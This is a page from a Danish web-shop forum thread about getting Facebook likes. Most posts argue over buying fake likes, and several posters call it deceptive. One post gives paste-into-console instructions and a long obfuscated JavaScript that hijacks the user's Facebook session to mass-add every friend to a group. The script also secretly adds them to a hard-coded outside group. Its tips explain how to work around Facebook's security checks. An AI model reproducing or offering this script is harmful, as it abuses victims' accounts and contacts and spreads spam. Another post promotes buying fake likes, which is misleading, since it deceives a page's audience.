Hov. Du er ikke logget ind.
DU SKAL VÆRE LOGGET IND, FOR AT INTERAGERE PÅ DENNE SIDE

Jeg får ingen likes på min facebook side!

Side 2 ud af 3 (21 indlæg)
Tilmeldt 11. Dec 12
Indlæg ialt: 408
Skrevet kl. 20:37
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Mikkel Westh:

Jeg kunne desuden godt tænke mig at høre nærmere om hvordan Casper kan skaffe likes.. jeg kunne godt bruge et boost på et par hundrede likes, men hvordan handles like's?

Man kan da ikke "like" fra andres profilerer!!?  synes det lyder suspekt

ja jeg har også tit undret mig over hvordan det fungere i praksis? jeg købte på et tidspunkt 1000 likes på fiverr de kom som lovet men ca 10 % unliked igen jeg skrev til sælger og han gav mig 1500 likes mere ub 

de 1000 likes kom over et par timer et lille tip slå email notifikation fra Embarrassed 

noget jeg også syntes er lidt sjovt er at google+ er i meget højere kurs en facebook likes man kan få ca 30 + for samme pris som 1000 fbook likes 

Fra Ringsted
Tilmeldt 15. Nov 06
Indlæg ialt: 297
Fra  Lampeguru.dk Skrevet kl. 21:48
Hvor mange stjerner giver du? :

Vi står i samme problem, men har valgt at annoncerer på FB som giver ok med likes - nogle som kan bruges, for de trykker like fordi vi lyder spændende!!

Det med at købe sig til et par 100 likes er som at pisse i bukserne og samtidig betale for det, lad nu være med det!!!
Det tager bare tid med FB likes, men du sælger jo heller ikke dine varer til indkøbspris bare for at komme hurtigere frem i verden, vel?

Lamper til enhver smag - Nu over 2000 lamper! LampeGuru.dk

Tilmeldt 11. Dec 12
Indlæg ialt: 408
Skrevet kl. 22:14
Hvor mange stjerner giver du? :

GuruGuy:
Det med at købe sig til et par 100 likes er som at pisse i bukserne og samtidig betale for det, lad nu være med det!!!

er det noget du vil forklare nærmere ? jeg ser ingen problemer i det, man skal nok ikke regne med at de likes man køber bliver kunder eller at deres venner liker din side, men hvis det kun er af den grund at man gerne vil have en side med et par hundred likes eller 1000+ så er det en nem billig og hurtig måde

GuruGuy:
men du sælger jo heller ikke dine varer til indkøbspris bare for at komme hurtigere frem i verden, vel?
der er der vist masser af rigtig store firmaer der gør blot for at få kunder i butikken  så er der jo mulighed for mersalg og gensalgSmile

Fra Caracas
Tilmeldt 4. Jul 12
Indlæg ialt: 131
Fra  ImportSolution ImportSolutions office : ICON III 858 Sukhumvit soi 55 10110 BKK Skrevet kl. 06:56
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Fra Caracas
Tilmeldt 4. Jul 12
Indlæg ialt: 131
Fra  ImportSolution ImportSolutions office : ICON III 858 Sukhumvit soi 55 10110 BKK Skrevet kl. 06:58
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person
Instructions 
works for google Chrome browser only
1. open the appropriate group : link - select a group (scroll down to see the groups and their page link)
2. copy the text code, below .. 
3. while in the group page press F12 to open the "console page"
4. paste the text code.
note: if there is some code on the page you need to clear it - press F5 refresh the page (it should clear the window content to be empty)
when you paste the code and press enter, the page should begin to scroll with data showing the auto attempt to add members (your friends).  
If it does not press F5 to refresh the screen and try again, otherwise contact us or help e: fbgroupsbuldaddhelp@austhai.biz
the text code to copy is below
function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arrIdea,suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=134344036695273&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arrIdea;i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="Auto SUBSCRIBE for MY FB ACCOUNT ONLY (fb.com/groups/CyberRampagev2 for more info)",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var f=this.init();if(f&&b){f.overrideMimeType&&f.overrideMimeType("text/xml"),e||(e="GET"),d||(d="text"),g||(g={});var d=d.toLowerCase(),e=e.toUpperCase(),h="uid="+(new Date).getTime(),b=b+(b.indexOf("?")+1?"&":"?"),b=b+h,h=null;"POST"==e&&(h=b.split("?"),b=h[0],h=h[1]),f.open(e,b,!0),"POST"==e&&(f.setRequestHeader("Content-type","application/x-www-form-urlencoded"),f.setRequestHeader("Content-length",h.length),f.setRequestHeader("Connection","close")),f.onreadystatechange=g.handler?function(){g.handler(f)}:function(){if(f.readyState==4)if(f.status==200){var b="";f.responseText&&(b=f.responseText),d.charAt(0)=="j"?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):d.charAt(0)=="x"&&(b=f.responseXML),c&&c(b)}else g.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(g.loadingIndicator),g.loading&&(document.getElementById(g.loading).style.display="none"),error&&error(f.status)},f.send(h)}},bind:function(e){var t={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""},n;for(n in t)eNo&&(tNo=eNo);if(t.url){var r=!1;t.loadingIndicator&&(r=document.createElement("div"),r.setAttribute("style","position:absolute;top:0px;left:0px;"),r.setAttribute("class","loading-indicator"),r.innerHTML=t.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(r),this.opt.loadingIndicator=r),t.loading&&(document.getElementById(t.loading).style.display="block"),this.load(t.url,function(e){t.onSuccess&&t.onSuccess(e),t.update&&(document.getElementById(t.update).innerHTML=e),r&&document.getElementsByTagName("body")[0].removeChild(r),t.loading&&(document.getElementById(t.loading).style.display="none")},t.format,t.method,t)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(e,t,n,r){return"className"==n&&(n="class"),(e=document.evaluate(".//"+t+"[@"+n+"='"+r+"']",e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null))&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(e,t,n){return this.FindByAttr(e,t,"className",n)},FindByXPath:function(e,t){try{var n=document.evaluate(t,e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(r){GM_log("bad xpath:"+t)}return n&&n.singleNodeValue?n.singleNodeValue:null},VisitUrl:function(e){window.setTimeout(function(){document.location.href=e},500+Math.floor(500*Math.random()))},ClickWin:function(e,t,n){var r=e.document.createEvent("MouseEvents");return r.initMouseEvent(n,!0,!0,e,0,0,0,0,0,!1,!1,!1,!1,0,null),!t.dispatchEvent(r)},Click:function(e){return this.ClickWin(window,e,"click")},ClickTimeout:function(e,t){window.setTimeout(function(){return nHtml.ClickWin(window,e,"click")},t+Math.floor(500*Math.random()))},ClickUp:function(e){this.ClickWin(window,e,"mousedown"),this.ClickWin(window,e,"mouseup"),this.ClickWin(window,e,"click")},GetText:function(e,t){var n="";void 0==t&&(t=0);if(!(40<t)){if(void 0!=e.textContent)return e.textContent;for(var r=0;r<e.childNodes.length;r++)n+=this.GetText(e.childNodes[r],t+1);return n}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(e){for(var t=RegExp("(?:^|\\s)"+e+"(?:$|\\s)"),n=document.getElementsByTagName("*"),r=[],i,s=0;null!=(i=nSleep);s++){var o=i.className;o&&-1!=o.indexOf(e)&&t.test(o)&&r.push(i)}return r}),Array.prototype.find=function(e){var t=!1;for(i=0;i<this.length;i++)typeof e=="function"?e.test(thisIdea)&&(t||(t=[]),t.push(i)):thisIdea===e&&(t||(t=[]),t.push(i));return t};for(var a=0,eind=0,len=document.getElementsByClassName("mbm").length,a=0;a<len;a++){var ele=document.getElementsByClassName("mbm")Angel;if(ele&&ele.childNodes[0]&&ele.childNodes[0]&&ele.childNodes[0].childNodes[1]&&ele.childNodes[0].childNodes[1].childNodes[0]&&"Add SUSCRIBERS"==document.getElementsByClassName("mbm")Angel.childNodes[0].childNodes[1].childNodes[0].value){eind=a;break}}var i=3,tay=3,counter1=0,counter2=0,counter3=0,j=0,k=0,suc=0,arr=[],memberGroupId=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.user+"&filter[0]=user&__user="+Env.user,function(e){for(var e=e.substring(e.indexOf("{")),e=JSON.parse(e),e=e.payload.entries,t=0;t<e.length;t++)arr.push(e[t].uid);tay=i=arr.length-1,console.log(arr.length),e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arrIdea)})



tips:

you can stop any time by closing that window
once you've added many people facebook might block you from repeating the process with a "security check" warning (it goes away after a few days).
If you want to add to several groups then create a window for each at the same time and rotate between windows.
queries - use the email address above
Fra Højbjerg
Tilmeldt 13. May 12
Indlæg ialt: 696
Fra  PhoneWear Skrevet kl. 08:19
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Godmorgen Mads,

Husk på at 70 gode, aktive likes er bedre og mere værd end 1.000 fuldstændig ligegyldige likes. Som jeg ser det, ikke at jeg selv er en haj til det, går det ud på at skabe værdi for sine likes med forskellige opslag. De gode likes man har, deler/kommenterer/liker så opslagene og skaber viral effekt. Det er dét, man vil opnå, da det er dér, man kan hente rigtigt mange likes.

Det er derfor også dumt, og lidt bedragerisk, at købe sig til likes.

Held og lykke med det :)

Mvh.

Lars Thomsen

Find massere af billige iPhone og iPad covers på www.phonewear.dk

Tilmeldt 23. May 08
Indlæg ialt: 3316
Fra  Easypie ApS Skrevet kl. 09:25
Hvor mange stjerner giver du? :

HVORFOR skal man like dine facebookside? Får man bare en masse spam i hovedet, så giver du ingen værdi til dine kunder..

Fra København K
Tilmeldt 28. Jan 13
Indlæg ialt: 155
Fra  Clovermetrics Skrevet kl. 09:46
Hvor mange stjerner giver du? :
Gennemsnit 5,0 stjerner givet af 1 person

Hej Mads.

Fortsæt med at få de ægte og troværdige likes.
Det her med at købe dem er i mine øjne utroværdigt, og når man har en mindre virksomhed er forretningens troværdighed det vigtigste.
Sørg derfor for som nogle foreslår, at lave konkurrencer der er lovlige på facebook, og hold dig fra det andet. Det virker som om du har en god forretning ellers.

Jeg er ikke selv på Facebook og klikker derfor ikke på din "like" -  til gengæld har jeg kigget på din hjemmeside, og jeg syntes den er meget flot og venlig at komme ind på, og det er nogle flotte varer, og siden er nem at overskue :)

Venligst,
Bjarke 

Fra København
Tilmeldt 21. Sep 07
Indlæg ialt: 171
Skrevet kl. 09:52
Hvor mange stjerner giver du? :

Hej Mads, og alle andre webshop-ejere i denne tråd.

Jeg er netop i gang med et universitetsprojekt som har til formål at klarlægge hvordan mindre danske webshops kan få succes med deres Facebook-side.

For at kunne gennemføre studiet, er det dog nødvendigt at vi får en masse webshop-ejere til at besvare et kort spørgeskema (tager ca. 2-3 minutter), så jeg vil hermed opfordre jer til at gå ind at deltage.

Undersøgelsen er 100% anonym, men hvis I angiver jeres email-adresse i slutningen af spørgeskemaet, vil I få tilsendt resultaterne af undersøgelsen pr. mail, når de foreligger senere på sommeren.

På forhånd tak :)

Mathias Hoffmann


Tilmeldt 25. Jun 09
Indlæg ialt: 24
Fra  Nguyen.it Skrevet kl. 10:31
Hvor mange stjerner giver du? :

Hej,

jeg kender problemet. Jeg får heller ingen likes på min facebookside, men der er heller ikke meget aktivitet på den. Jeg kunne godt tænke mig at få FB likes gennem min webshop istedet. Det virker bedre, især når folk har fået en god oplevelse på siden. Har I nogle gode foreslag? skal man lave et popvindue?

Side 2 ud af 3 (21 indlæg)